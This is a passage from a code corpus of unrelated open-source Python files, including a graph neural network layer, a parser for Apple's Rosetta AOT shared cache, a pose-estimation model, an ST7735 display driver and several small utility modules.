pagerank_f = use_cuda(Variable(torch.from_numpy(q2e_adj_mat).type('torch.FloatTensor'), requires_grad=True))
q2e_adj_mat = use_cuda(Variable(torch.from_numpy(q2e_adj_mat).type('torch.FloatTensor'), requires_grad=False))
assert pagerank_f.requires_grad == True
# encode query
query_word_emb = self.WordEmbedding(query_text)
query_hidden_emb, (query_node_emb, _) = self.node_encoder(self.lstm_drop(query_word_emb), self.init_hidden(1, batch_size, self.trans_units))
query_node_emb = query_node_emb.squeeze(dim=0).unsqueeze(dim=1)
query_rel_emb = query_node_emb
# build kb_adj_matrix from sparse matrix
(e2f_batch, e2f_f, e2f_e, e2f_val), (f2e_batch, f2e_e, f2e_f, f2e_val) = kb_adj_mat
entity2fact_index = torch.LongTensor([e2f_batch, e2f_f, e2f_e])
entity2fact_val = torch.FloatTensor(e2f_val)
entity2fact_mat = use_cuda(torch.sparse.FloatTensor(entity2fact_index, entity2fact_val, torch.Size([batch_size, max_fact, max_local_entity])))
fact2entity_index = torch.LongTensor([f2e_batch, f2e_e, f2e_f])
fact2entity_val = torch.FloatTensor(f2e_val)
fact2entity_mat = use_cuda(torch.sparse.FloatTensor(fact2entity_index, fact2entity_val, torch.Size([batch_size, max_local_entity, max_fact])))
local_fact_emb = self.EntityEmbedding(kb_fact_rel)
# attention fact2question
div = float(np.sqrt(self.trans_units))
fact2query_sim = torch.bmm(query_hidden_emb, local_fact_emb.transpose(1, 2)) / div
fact2query_sim = self.softmax_d1(fact2query_sim + (1 - query_mask.unsqueeze(dim=2)) * VERY_NEG_NUMBER)
fact2query_att = torch.sum(fact2query_sim.unsqueeze(dim=3) * query_hidden_emb.unsqueeze(dim=2), dim=1)
W = torch.sum(fact2query_att * local_fact_emb, dim=2) / div
W_max = torch.max(W, dim=1, keepdim=True)[0]
W_tilde = torch.exp(W - W_max)
e2f_softmax = self.sparse_bmm(entity2fact_mat.transpose(1, 2), W_tilde.unsqueeze(dim=2)).squeeze(dim=2)
e2f_softmax = torch.clamp(e2f_softmax, min=VERY_SMALL_NUMBER)
e2f_out_dim = use_cuda(Variable(torch.sum(entity2fact_mat.to_dense(), dim=1), requires_grad=False))
# load entity embedding
local_entity_emb = self.EntityEmbedding(local_entity)
# label propagation on entities
for i in range(self.gnn_layers):
# get linear transformation functions for each layer
q2e_linear = getattr(self, 'q2e_linear' + str(i))
d2e_linear = getattr(self, 'd2e_linear' + str(i))
e2q_linear = getattr(self, 'e2q_linear' + str(i))
e2d_linear = getattr(self, 'e2d_linear' + str(i))
e2e_linear = getattr(self, 'e2e_linear' + str(i))
kb_self_linear = getattr(self, 'kb_self_linear' + str(i))
kb_head_linear = getattr(self, 'kb_head_linear' + str(i))
kb_tail_linear = getattr(self, 'kb_tail_linear' + str(i))
# start propagation
next_local_entity_emb = local_entity_emb
# STEP 1: propagate from question, documents, and facts to entities
# question -> entity
q2e_emb = q2e_linear(self.linear_drop(query_node_emb)).expand(batch_size, max_local_entity, self.trans_units)
next_local_entity_emb = torch.cat((next_local_entity_emb, q2e_emb), dim=2)
# fact -> entity
e2f_emb = self.relu(kb_self_linear(local_fact_emb) + self.sparse_bmm(entity2fact_mat, kb_head_linear(self.linear_drop(local_entity_emb))))
e2f_softmax_normalized = W_tilde.unsqueeze(dim=2) * self.sparse_bmm(entity2fact_mat, (pagerank_f / e2f_softmax).unsqueeze(dim=2))
e2f_emb = e2f_emb * e2f_softmax_normalized
f2e_emb = self.relu(kb_self_linear(local_entity_emb) + self.sparse_bmm(fact2entity_mat, kb_tail_linear(self.linear_drop(e2f_emb))))
pagerank_f = self.pagerank_lambda * self.sparse_bmm(fact2entity_mat, e2f_softmax_normalized).squeeze(dim=2) + (1 - self.pagerank_lambda) * pagerank_f
# STEP 2: combine embeddings from fact
next_local_entity_emb = torch.cat((next_local_entity_emb, self.fact_scale * f2e_emb), dim=2)
# STEP 3: propagate from entities to update question, documents, and facts
# entity -> query
query_node_emb = torch.bmm(pagerank_f.unsqueeze(dim=1), e2q_linear(self.linear_drop(next_local_entity_emb)))
# update entity
local_entity_emb = self.relu(e2e_linear(self.linear_drop(next_local_entity_emb)))
return local_entity_emb
def init_hidden(self, num_layer, batch_size, hidden_size):
return (use_cuda(Variable(torch.zeros(num_layer, batch_size, hidden_size))),
use_cuda(Variable(torch.zeros(num_layer, batch_size, hidden_size))))
def sparse_bmm(self, X, Y):
"""Batch multiply X and Y where X is sparse, Y is dense.
Args:
X: Sparse tensor of size BxMxN. Consists of two tensors,
I:3xZ indices, and V:1xZ values.
Y: Dense tensor of size BxNxK.
Returns:
batched-matmul(X, Y): BxMxK
"""
class LeftMMFixed(torch.autograd.Function):
"""
Implementation of matrix multiplication of a Sparse Variable with a Dense Variable, returning a Dense one.
This is added because there's no autograd for sparse yet. No gradient computed on the sparse weights.
"""
@staticmethod
def forward(ctx, sparse_weights, x):
ctx.sparse_weights = sparse_weights
return torch.mm(ctx.sparse_weights, x)
@staticmethod
def backward(ctx, grad_output):
sparse_weights = ctx.sparse_weights
return None, torch.mm(sparse_weights.t(), grad_output)
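        # Flatten the batch: build a (B*M) x Z sparse selector S from X's nonzeros,
        # gather the matching rows of Y, do a single 2-D sparse mm, then reshape the
        # (B*M) x K product back to B x M x K.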
I = X._indices()
V = X._values()
B, M, N = X.size()
_, _, K = Y.size()
Z = I.size()[1]
lookup = Y[I[0, :], I[2, :], :]
X_I = torch.stack((I[0, :] * M + I[1, :], use_cuda(torch.arange(Z).type(torch.LongTensor))), 0)
S = use_cuda(Variable(torch.sparse.FloatTensor(X_I, V, torch.Size([B * M, Z])), requires_grad=False))
prod = LeftMMFixed.apply(S, lookup)
return prod.view(B, M, K)
|
AotSharedCacheExtractor/main.py | FFRI/ProjectChampollion | 172 | 12728450 | #
# (c) FFRI Security, Inc., 2021 / Author: FFRI Security, Inc.
#
import mmap
import os
from ctypes import Structure, c_uint32, c_uint64, sizeof
from typing import Iterable, Optional, cast
import typer
app = typer.Typer()
AOT_SHARED_CACHE_MAGIC = 0x6568636143746F41
def show_err(msg: str) -> None:
typer.secho(msg, err=True, fg=typer.colors.RED)
def show_warn(msg: str) -> None:
typer.secho(msg, err=True, fg=typer.colors.YELLOW)
def show_log(msg: str) -> None:
typer.secho(msg, err=True, fg=typer.colors.GREEN)
class AotMappingInfo(Structure):
"""
struct AotMappingInfo {
uint64_t address;
uint64_t size;
uint64_t file_offset;
uint32_t init_prot;
uint32_t max_prot;
};
"""
_fields_ = (
("address", c_uint64),
("size", c_uint64),
("file_offset", c_uint64),
("init_prot", c_uint32),
("max_prot", c_uint32),
)
def __str__(self) -> str:
return f"""\tAotMappingInfo:
\t\taddress: {hex(self.address)}
\t\tsize: {hex(self.size)}
\t\tfile_offset: {hex(self.file_offset)}
\t\tinit_prot: {hex(self.init_prot)}
\t\tmax_prot: {hex(self.max_prot)}
"""
class AotSharedCacheHeader(Structure):
"""
struct AotSharedCacheHeader {
uint64_t magic;
uint64_t field_0x8;
uint64_t field_0x10;
uint64_t uuid[2];
uint64_t version[4];
uint64_t offset_to_codesig;
uint64_t size_of_codesig;
uint32_t n_entries;
uint32_t offset_to_metadata_seg;
struct AotMappingInfo mapping[3];
};
"""
_fields_ = (
("magic", c_uint64),
("field_0x8", c_uint64),
("field_0x10", c_uint64),
("uuid", c_uint64 * 2),
("version", c_uint64 * 4),
("offset_to_codesig", c_uint64),
("size_of_codesig", c_uint64),
("n_entries", c_uint32),
("offset_to_metadata_seg", c_uint32),
("mapping", AotMappingInfo * 3),
)
def __str__(self) -> str:
return f"""AotSharedCacheHeader:
\tmagic: {hex(self.magic)}
\tfield_0x8: {hex(self.field_0x8)}
\tfield_0x10: {hex(self.field_0x10)}
\tuuid: {[hex(self.uuid[i]) for i in range(2)]}
\tversion: {[hex(self.version[i]) for i in range(4)]}
\toffset_to_codesig: {hex(self.offset_to_codesig)}
\tsize_of_codesig: {hex(self.size_of_codesig)}
\tn_entries: {hex(self.n_entries)}
\toffset_to_metadata_seg: {hex(self.offset_to_metadata_seg)}
\tmapping:\n {''.join(str(self.mapping[i]) for i in range(3))}"""
class CodeFragmentMetaData(Structure):
_fields_ = (
("type", c_uint32),
("offset_to_path_name", c_uint32),
("offset_to_x64_code", c_uint32),
("size_of_x64_code", c_uint32),
("offset_to_arm64_code", c_uint32),
("size_of_arm64_code", c_uint32),
("offset_to_branch_data", c_uint32),
("size_of_branch_data", c_uint32),
("offset_to_insn_map", c_uint32),
("size_of_insn_map", c_uint32),
)
def __str__(self) -> str:
return f"""CodeFragmentMetaData:
\ttype: {hex(self.type)}
\toffset_to_path_name: {hex(self.offset_to_path_name)}
\toffset_to_x64_code: {hex(self.offset_to_x64_code)}
\tsize_of_x64_code: {hex(self.size_of_x64_code)}
\toffset_to_arm64_code: {hex(self.offset_to_arm64_code)}
\tsize_of_arm64_code: {hex(self.size_of_arm64_code)}
\toffset_to_branch_data: {hex(self.offset_to_branch_data)}
\tsize_of_branch_data: {hex(self.size_of_branch_data)}
\toffset_to_insn_map: {hex(self.offset_to_insn_map)}
\tsize_of_insn_map: {hex(self.size_of_insn_map)}"""
def load_aot_mapped_module_names(mapped_module_file: str) -> Optional[Iterable[str]]:
if not os.path.exists(mapped_module_file):
show_err(f"{mapped_module_file} does not exist")
return None
with open(mapped_module_file, "r") as fin:
for line in fin.readlines():
yield line.strip()
@app.command()
def extract_codesig(aot_shared_cache_path: str, output_file_path: str) -> None:
if not os.path.exists(aot_shared_cache_path):
show_err(f"{aot_shared_cache_path} does not exist")
return
with open(aot_shared_cache_path, "r+b") as fin:
mm = mmap.mmap(fin.fileno(), 0)
header = AotSharedCacheHeader.from_buffer_copy(
cast(bytes, mm[0:sizeof(AotSharedCacheHeader)]), 0
)
if header.magic != AOT_SHARED_CACHE_MAGIC:
show_err("magic should be AotCache")
return
codesig_beg = header.offset_to_codesig
codesig_end = codesig_beg + header.size_of_codesig
show_log(f"Will extract a code signature located at [{hex(codesig_beg)}, {hex(codesig_end)}]")
with open(output_file_path, "wb") as fout:
fout.write(cast(bytes, mm[codesig_beg:codesig_end]))
show_log(f"The extracted code signature is saved to {output_file_path}")
@app.command()
def dump(aot_shared_cache_path: str) -> None:
if not os.path.exists(aot_shared_cache_path):
show_err(f"{aot_shared_cache_path} does not exist")
return
if (
mapped_module_names := load_aot_mapped_module_names("aot_mapped_module_names")
) is None:
return
with open(aot_shared_cache_path, "r+b") as fin:
mm = mmap.mmap(fin.fileno(), 0)
header = AotSharedCacheHeader.from_buffer_copy(
cast(bytes, mm[0:sizeof(AotSharedCacheHeader)]), 0
)
if header.magic != AOT_SHARED_CACHE_MAGIC:
show_err("magic should be AotCache")
return
typer.echo(header)
aot_seg_beg = header.mapping[2].file_offset
metadata_seg_beg = header.offset_to_metadata_seg
typer.echo(f"metadata segment starts from {hex(metadata_seg_beg)}")
cur_seek = header.offset_to_metadata_seg
typer.echo(f"number of entries is {header.n_entries}")
for _ in range(header.n_entries):
entry = CodeFragmentMetaData.from_buffer_copy(
cast(bytes, mm[cur_seek : cur_seek + sizeof(CodeFragmentMetaData)])
)
typer.echo(entry)
cur_seek += sizeof(CodeFragmentMetaData)
if entry.type == 0:
if cur_seek != metadata_seg_beg + entry.offset_to_branch_data:
show_err("branch data does not follow")
show_err(
f"{hex(cur_seek)} {hex(metadata_seg_beg)} {hex(entry.offset_to_branch_data)}"
)
return
branch_data_beg, branch_data_end = cur_seek, cur_seek + entry.size_of_branch_data
cur_seek += entry.size_of_branch_data
if cur_seek != metadata_seg_beg + entry.offset_to_insn_map:
show_err("instruction map data does not follow")
show_err(
f"{hex(cur_seek)} {hex(metadata_seg_beg)} {hex(entry.offset_to_insn_map)}"
)
return
insn_map_beg, insn_map_end = cur_seek, cur_seek + entry.size_of_insn_map
cur_seek += entry.size_of_insn_map
arm64_code_beg = aot_seg_beg + entry.offset_to_arm64_code
cache_code_end = arm64_code_beg + entry.size_of_arm64_code
typer.echo(
f"[{hex(arm64_code_beg)}, {hex(cache_code_end)}] {next(mapped_module_names)}"
)
typer.echo(
f"\tbranch data: [{hex(branch_data_beg)}, {hex(branch_data_end)}]"
)
typer.echo(
f"\tinstruction map: [{hex(insn_map_beg)}, {hex(insn_map_end)}]"
)
elif entry.type == 1:
runtime_begin = aot_seg_beg + entry.offset_to_arm64_code
runtime_end = runtime_begin + entry.size_of_arm64_code
typer.echo(
f"[{hex(runtime_begin)}, {hex(runtime_end)}] RuntimeRoutines"
)
else:
show_err(f"Unknown CodeSegmentMetadata entry ({hex(entry.type)})")
return
if __name__ == "__main__":
app()
|
sfaira/versions/genomes/__init__.py | theislab/sfaira | 110 | 12728471 | from .genomes import GenomeContainer, GtfInterface
from .utils import translate_id_to_symbols, translate_symbols_to_id
|
moe/__init__.py | misokg/Cornell-MOE | 218 | 12728560 |
# -*- coding: utf-8 -*-
#: Following the versioning system at http://semver.org/
#: See also docs/contributing.rst, section ``Versioning``
#: MAJOR: incremented for incompatible API changes
MAJOR = 1
#: MINOR: incremented for adding functionality in a backwards-compatible manner
MINOR = 0
#: PATCH: incremented for backward-compatible bug fixes and minor capability improvements
PATCH = 0
#: Latest release version of MOE
__version__ = "{0:d}.{1:d}.{2:d}".format(MAJOR, MINOR, PATCH)
|
mle_monitor/protocol/tables.py | mle-infrastructure/mle-monitor | 107 | 12728581 |
import pandas as pd
from datetime import datetime
from rich import box
from rich.table import Table
from rich.spinner import Spinner
from rich.console import Console
from rich.align import Align
from rich.progress import (
BarColumn,
Progress,
TextColumn,
)
def protocol_summary(
db, all_experiment_ids, tail: int = 5, verbose: bool = True, full: bool = False
):
"""Construct a summary dataframe of previous experiments."""
# Set pandas df format option to print
pd.set_option("display.max_columns", 5)
pd.set_option("max_colwidth", 30)
if len(all_experiment_ids) > 0:
purposes, project_names, exp_paths = [], [], []
num_seeds, statuses, start_times, experiment_types = [], [], [], []
resource, num_cpus, num_gpus, total_jobs, completed_jobs = [], [], [], [], []
if tail is None:
tail = len(all_experiment_ids)
# Loop over experiment ids and extract data to retrieve
for int_e_id in all_experiment_ids[-tail:]:
e_id = str(int_e_id)
purposes.append(db.dget(e_id, "purpose"))
project_names.append(db.dget(e_id, "project_name"))
exp_paths.append(db.dget(e_id, "experiment_dir"))
statuses.append(db.dget(e_id, "job_status"))
start_times.append(db.dget(e_id, "start_time"))
resource.append(db.dget(e_id, "exec_resource"))
num_seeds.append(db.dget(e_id, "num_seeds"))
num_cpus.append(db.dget(e_id, "num_cpus"))
num_gpus.append(db.dget(e_id, "num_gpus"))
experiment_types.append(db.dget(e_id, "experiment_type"))
total_jobs.append(db.dget(e_id, "num_total_jobs"))
completed_jobs.append(db.dget(e_id, "completed_jobs"))
d = {
"ID": [str(e_id) for e_id in all_experiment_ids[-tail:]],
"Date": start_times,
"Project": project_names,
"Purpose": purposes,
"Experiment Dir": exp_paths,
"Status": statuses,
"Seeds": num_seeds,
"Resource": resource,
"CPUs": num_cpus,
"GPUs": num_gpus,
"Type": experiment_types,
"Jobs": total_jobs,
"Completed Jobs": completed_jobs,
}
df = pd.DataFrame(d)
df["Date"] = df["Date"].map("{:.5}".format)
df["Purpose"] = df["Purpose"].map("{:.30}".format)
# Print a nice table overview (no job resources)
if verbose:
Console().print(Align.left(protocol_table(df, full)))
return df
else:
if verbose:
time_t = datetime.now().strftime("%m/%d/%Y %I:%M:%S %p")
print(time_t, "No previously recorded experiments")
return None
def get_progress_bar(total_jobs: int, completed_jobs: int):
progress = Progress(
TextColumn(
"{task.completed:^3.0f}/{task.total:^3.0f}", justify="left", style="white"
),
BarColumn(bar_width=10, style="red"),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%", style="white"),
auto_refresh=False,
)
task = progress.add_task("queue", total=total_jobs)
progress.update(task, completed=completed_jobs, refresh=True)
return progress
def protocol_table(df, full: bool = True):
"""Generate pretty table of experiment protocol db - preselected db."""
table = Table(show_header=True, show_footer=False, header_style="bold blue")
table.add_column(":bookmark:", justify="center")
table.add_column(":id:", justify="center")
table.add_column(":spiral_calendar:", justify="center")
table.add_column("Project")
table.add_column("Purpose")
table.add_column("Type")
table.add_column("[yellow]:arrow_forward:", justify="center")
table.add_column("[yellow]:recycle:", justify="center")
table.add_column("CPU", justify="center")
table.add_column("GPU", justify="center")
# Full option prints also resource requirements of jobs
if full:
table.add_column(
":hourglass_flowing_sand: Completed Jobs [yellow]:heavy_check_mark:",
justify="center",
)
# Add rows of info if dataframe exists (previously recorded experiments)
if df is not None:
for index in reversed(df.index):
row = df.iloc[index]
if row["Resource"] == "sge-cluster":
resource = "SGE"
elif row["Resource"] == "slurm-cluster":
resource = "Slurm"
elif row["Resource"] == "gcp-cloud":
resource = "GCP"
else:
resource = "Local"
if row["Type"] == "hyperparameter-search":
exp_type = "search"
elif row["Type"] == "multiple-configs":
exp_type = "config"
elif row["Type"] == "single-config":
exp_type = "single"
else:
exp_type = row["Type"]
if row["Status"] == "running":
status = Spinner("dots", style="magenta")
elif row["Status"] == "completed":
status = "[green]:heavy_check_mark:"
else:
status = "[red]:heavy_multiplication_x:"
if full:
bar = get_progress_bar(int(row["Jobs"]), int(row["Completed Jobs"]))
table.add_row(
status,
row["ID"],
row["Date"],
row["Project"][:10],
row["Purpose"][:15],
exp_type,
resource,
str(row["Seeds"]),
str(row["CPUs"]),
str(row["GPUs"]),
bar,
)
else:
table.add_row(
status,
row["ID"],
row["Date"],
row["Project"][:10],
row["Purpose"][:25],
exp_type,
resource,
str(row["Seeds"]),
str(row["CPUs"]),
str(row["GPUs"]),
)
table.border_style = "blue"
table.box = box.SIMPLE_HEAD
return table
|
src/agent/kubernetes-agent/src/network/__init__.py | hyperledger-gerrit-archive/cello | 865 | 12728602 |
#
# SPDX-License-Identifier: Apache-2.0
#
from .fabric import FabricNetwork
|
src/livestreamer/packages/flashmedia/error.py | jaccarmac/livestreamer | 3,614 | 12728648 |
#!/usr/bin/env python
class FLVError(Exception):
pass
class F4VError(Exception):
pass
class AMFError(Exception):
pass
__all__ = ["FLVError", "F4VError", "AMFError"]
|
src/model/paf_model.py | ParikhKadam/part-affinity | 110 | 12728668 | import torch.nn as nn
from .helper import init, make_standard_block
import torch
class PAFModel(nn.Module):
def __init__(self, backend, backend_outp_feats, n_joints, n_paf, n_stages=7):
super(PAFModel, self).__init__()
assert (n_stages > 0)
self.backend = backend
stages = [Stage(backend_outp_feats, n_joints, n_paf, True)]
for i in range(n_stages - 1):
stages.append(Stage(backend_outp_feats, n_joints, n_paf, False))
self.stages = nn.ModuleList(stages)
def forward(self, x):
img_feats = self.backend(x)
cur_feats = img_feats
heatmap_outs = []
paf_outs = []
for i, stage in enumerate(self.stages):
heatmap_out, paf_out = stage(cur_feats)
heatmap_outs.append(heatmap_out)
paf_outs.append(paf_out)
cur_feats = torch.cat([img_feats, heatmap_out, paf_out], 1)
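        # per-stage predictions are returned so the loss can supervise every stage
        # (intermediate supervision), not only the final refinement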
return heatmap_outs, paf_outs
class Stage(nn.Module):
def __init__(self, backend_outp_feats, n_joints, n_paf, stage1):
super(Stage, self).__init__()
inp_feats = backend_outp_feats
if stage1:
self.block1 = make_paf_block_stage1(inp_feats, n_joints)
self.block2 = make_paf_block_stage1(inp_feats, n_paf)
else:
inp_feats = backend_outp_feats + n_joints + n_paf
self.block1 = make_paf_block_stage2(inp_feats, n_joints)
self.block2 = make_paf_block_stage2(inp_feats, n_paf)
init(self.block1)
init(self.block2)
def forward(self, x):
y1 = self.block1(x)
y2 = self.block2(x)
return y1, y2
def make_paf_block_stage1(inp_feats, output_feats):
layers = [make_standard_block(inp_feats, 128, 3),
make_standard_block(128, 128, 3),
make_standard_block(128, 128, 3),
make_standard_block(128, 512, 1, 1, 0)]
layers += [nn.Conv2d(512, output_feats, 1, 1, 0)]
return nn.Sequential(*layers)
def make_paf_block_stage2(inp_feats, output_feats):
layers = [make_standard_block(inp_feats, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 1, 1, 0)]
layers += [nn.Conv2d(128, output_feats, 1, 1, 0)]
return nn.Sequential(*layers)
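# Stage-2+ blocks swap the 3x3 kernels of stage 1 for 7x7 kernels, widening the receptive
# field over the concatenated image features and previous-stage predictions.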
|
atcoder/abc099/b.py | Ashindustry007/competitive-programming | 506 | 12728674 |
#!/usr/bin/env python3
# https://abc099.contest.atcoder.jp/tasks/abc099_b
a, b = map(int, input().split())
d = b - a
k = d * (d - 1) // 2
print(k - a)
|
convert.py | onlyrico/RepMLP | 220 | 12728709 | import argparse
import os
import torch
from repmlpnet import *
parser = argparse.ArgumentParser(description='RepMLPNet Conversion')
parser.add_argument('load', metavar='LOAD', help='path to the source weights file')
parser.add_argument('save', metavar='SAVE', help='path to the target weights file')
parser.add_argument('-a', '--arch', metavar='ARCH', default='RepMLPNet-B224')
def convert():
args = parser.parse_args()
if args.arch == 'RepMLPNet-B224':
model = create_RepMLPNet_B224(deploy=False)
elif args.arch == 'RepMLPNet-B256':
model = create_RepMLPNet_B256(deploy=False)
else:
raise ValueError('TODO')
if os.path.isfile(args.load):
print("=> loading checkpoint '{}'".format(args.load))
checkpoint = torch.load(args.load, map_location='cpu')
if 'state_dict' in checkpoint:
checkpoint = checkpoint['state_dict']
elif 'model' in checkpoint:
checkpoint = checkpoint['model']
ckpt = {k.replace('module.', ''): v for k, v in checkpoint.items()} # strip the names
print(ckpt.keys())
model.load_state_dict(ckpt)
else:
print("=> no checkpoint found at '{}'".format(args.load))
model.locality_injection()
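    # locality_injection() folds the trained conv branches into the FC weights, so the
    # checkpoint written below is the re-parameterised, inference-time form of the model.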
torch.save(model.state_dict(), args.save)
if __name__ == '__main__':
convert() |
env/Lib/site-packages/OpenGL/GLES2/ANGLE/pack_reverse_row_order.py | 5gconnectedbike/Navio2 | 210 | 12728716 | '''OpenGL extension ANGLE.pack_reverse_row_order
This module customises the behaviour of the
OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order to provide a more
Python-friendly API
Overview (from the spec)
This extension introduces a mechanism to allow reversing the order
in which image rows are written into a pack destination. This
effectively allows an application to flip the results of a ReadPixels
in the y direction operation without having to render upside down.
The coordinate system of OpenGL is vertically reversed in comparison to a
number of other graphics systems such as native windowing APIs. Applications
that perform ReadPixels may have to either render to an intermediate color
buffer before calling ReadPixels or perform a flip in software after
ReadPixels. In some systems the GL can perform the row reversal during
ReadPixels without incurring additional cost.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ANGLE/pack_reverse_row_order.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order import *
from OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order import _EXTENSION_NAME
def glInitPackReverseRowOrderANGLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
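# A minimal usage sketch (not part of the generated module). It assumes a current
# GLES2 context and that GL_PACK_REVERSE_ROW_ORDER_ANGLE plus the glPixelStorei and
# glReadPixels entry points are available; width and height are placeholders.
#   if glInitPackReverseRowOrderANGLE():
#       glPixelStorei(GL_PACK_REVERSE_ROW_ORDER_ANGLE, 1)  # flip rows during ReadPixels
#       pixels = glReadPixels(0, 0, width, height, GL_RGBA, GL_UNSIGNED_BYTE)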
### END AUTOGENERATED SECTION |
vedastr/models/bodies/rectificators/registry.py | csmasters/vedastr | 475 | 12728758 | from vedastr.utils import Registry
RECTIFICATORS = Registry('Rectificator')
|
python/samples/st7735s.py | robn/spidriver | 142 | 12728793 | <reponame>robn/spidriver<gh_stars>100-1000
#!/usr/bin/env python3
# coding=utf-8
import array
import getopt
import struct
import sys
import time
from PIL import Image
from spidriver import SPIDriver
# Pure Python rgb to 565 encoder for portability
def as565(im):
rr, gg, bb = [list(c.getdata()) for c in im.convert("RGB").split()]
def s(x, n):
return x * (2 ** n - 1) // 255
d565 = [(s(b, 5) << 11) | (s(g, 6) << 5) | s(r, 5) for (r,g,b) in zip(rr, gg, bb)]
d565h = array.array('H', d565)
d565h.byteswap()
    return array.array('B', d565h.tobytes())  # array.tostring() was removed in Python 3.9
NOP = 0x00
SWRESET = 0x01
RDDID = 0x04
RDDST = 0x09
SLPIN = 0x10
SLPOUT = 0x11
PTLON = 0x12
NORON = 0x13
INVOFF = 0x20
INVON = 0x21
DISPOFF = 0x28
DISPON = 0x29
CASET = 0x2A
RASET = 0x2B
RAMWR = 0x2C
RAMRD = 0x2E
PTLAR = 0x30
COLMOD = 0x3A
MADCTL = 0x36
FRMCTR1 = 0xB1
FRMCTR2 = 0xB2
FRMCTR3 = 0xB3
INVCTR = 0xB4
DISSET5 = 0xB6
PWCTR1 = 0xC0
PWCTR2 = 0xC1
PWCTR3 = 0xC2
PWCTR4 = 0xC3
PWCTR5 = 0xC4
VMCTR1 = 0xC5
RDID1 = 0xDA
RDID2 = 0xDB
RDID3 = 0xDC
RDID4 = 0xDD
PWCTR6 = 0xFC
GMCTRP1 = 0xE0
GMCTRN1 = 0xE1
DELAY = 0x80
class ST7735:
def __init__(self, sd):
self.sd = sd
self.sd.unsel()
def write(self, a, c):
self.sd.seta(a)
self.sd.sel()
self.sd.write(c)
self.sd.unsel()
def writeCommand(self, cc):
self.write(0, struct.pack("B", cc))
def writeData(self, c):
self.write(1, c)
def writeData1(self, cc):
self.writeData(struct.pack("B", cc))
def cmd(self, cc, args=()):
self.writeCommand(cc)
n = len(args)
if n != 0:
self.writeData(struct.pack(str(n) + "B", *args))
def setAddrWindow(self, x0, y0, x1, y1):
self.writeCommand(CASET) # Column addr set
self.writeData(struct.pack(">HH", x0, x1))
self.writeCommand(RASET) # Row addr set
self.writeData(struct.pack(">HH", y0, y1))
self.writeCommand(RAMWR) # write to RAM
def rect(self, x, y, w, h, color):
self.setAddrWindow(x, y, x + w - 1, y + h - 1)
self.writeData(w * h * struct.pack(">H", color))
def start(self):
self.sd.setb(0)
time.sleep(.001)
self.sd.setb(1)
time.sleep(.001)
self.cmd(SWRESET) # Software reset, 0 args, w/delay
time.sleep(.180)
self.cmd(SLPOUT) # Out of sleep mode, 0 args, w/delay
time.sleep(.180)
commands = [
(FRMCTR1, ( # Frame rate ctrl - normal mode
0x01, 0x2C, 0x2D)), # Rate = fosc/(1x2+40) * (LINE+2C+2D)
(FRMCTR2, ( # Frame rate control - idle mode
0x01, 0x2C, 0x2D)), # Rate = fosc/(1x2+40) * (LINE+2C+2D)
(FRMCTR3, ( # Frame rate ctrl - partial mode
0x01, 0x2C, 0x2D, # Dot inversion mode
0x01, 0x2C, 0x2D)), # Line inversion mode
(PWCTR1, ( # Power control
0xA2,
0x02, # -4.6V
0x84)), # AUTO mode
(PWCTR2, ( # Power control
0xC5,)), # VGH25 = 2.4C VGSEL = -10 VGH = 3 * AVDD
(PWCTR3, ( # Power control
0x0A, # Opamp current small
0x00)), # Boost frequency
(PWCTR4, ( # Power control
0x8A, # BCLK/2, Opamp current small & Medium low
0x2A)),
(PWCTR5, ( # Power control
0x8A, 0xEE)),
(VMCTR1, ( # VCOM control
0x0E,)),
(MADCTL, ( # Memory access control (directions)
0xC8,)), # row addr/col addr, bottom to top refresh
(COLMOD, ( # set color mode
0x05,)), # 16-bit color
            (GMCTRP1, (    # Gamma + polarity Correction Characteristics
0x02, 0x1c, 0x07, 0x12,
0x37, 0x32, 0x29, 0x2d,
0x29, 0x25, 0x2B, 0x39,
0x00, 0x01, 0x03, 0x10)),
            (GMCTRN1, (    # Gamma - polarity Correction Characteristics
0x03, 0x1d, 0x07, 0x06,
0x2E, 0x2C, 0x29, 0x2D,
0x2E, 0x2E, 0x37, 0x3F,
0x00, 0x00, 0x02, 0x10)),
(NORON, ()), # Normal display on
(DISPON, ()), # Main screen turn on
]
for c, args in commands:
self.cmd(c, args)
def clear(self):
self.rect(0, 0, 128, 160, 0x0000)
def loadimage(self, a):
im = Image.open(a)
if im.size[0] > im.size[1]:
im = im.transpose(Image.ROTATE_90)
w = 160 * im.size[0] // im.size[1]
im = im.resize((w, 160), Image.ANTIALIAS)
(w, h) = im.size
if w > 128:
im = im.crop((w // 2 - 64, 0, w // 2 + 64, 160))
elif w < 128:
c = Image.new("RGB", (128, 160))
c.paste(im, (64 - w // 2, 0))
im = c
        self.setAddrWindow(0, 0, 127, 159)
        self.writeData(as565(im.convert("RGB")))
if __name__ == '__main__':
try:
optlist, args = getopt.getopt(sys.argv[1:], "h:")
except getopt.GetoptError as reason:
print()
print('usage: st7735 [ -h device ] image...')
print()
print()
sys.exit(1)
optdict = dict(optlist)
st = ST7735(SPIDriver(optdict.get('-h', "/dev/ttyUSB0")))
st.start()
st.clear()
for a in args:
st.loadimage(a)
|
napari/_tests/test_multiple_viewers.py | MaksHess/napari | 1,345 | 12728827 | from napari import Viewer
def test_multi_viewers_dont_clash(qapp):
v1 = Viewer(show=False, title='v1')
v2 = Viewer(show=False, title='v2')
assert not v1.grid.enabled
assert not v2.grid.enabled
v1.window.activate() # a click would do this in the actual gui
v1.window._qt_viewer.viewerButtons.gridViewButton.click()
assert not v2.grid.enabled
assert v1.grid.enabled
v1.close()
v2.close()
|
src/lockmgr.py | anbo225/docklet | 273 | 12728833 | #!/usr/bin/python3
'''
This module manages threading locks.
A LockMgr manages multiple threading locks, each identified by a name.
'''
import threading
class LockMgr:
def __init__(self):
# self.locks will store multiple locks by their names.
self.locks = {}
        # the lock protecting self.locks; it ensures that only one thread updates it at a time
self.locks_lock = threading.Lock()
# acquire a lock by its name
def acquire(self, lock_name):
self.locks_lock.acquire()
if lock_name not in self.locks.keys():
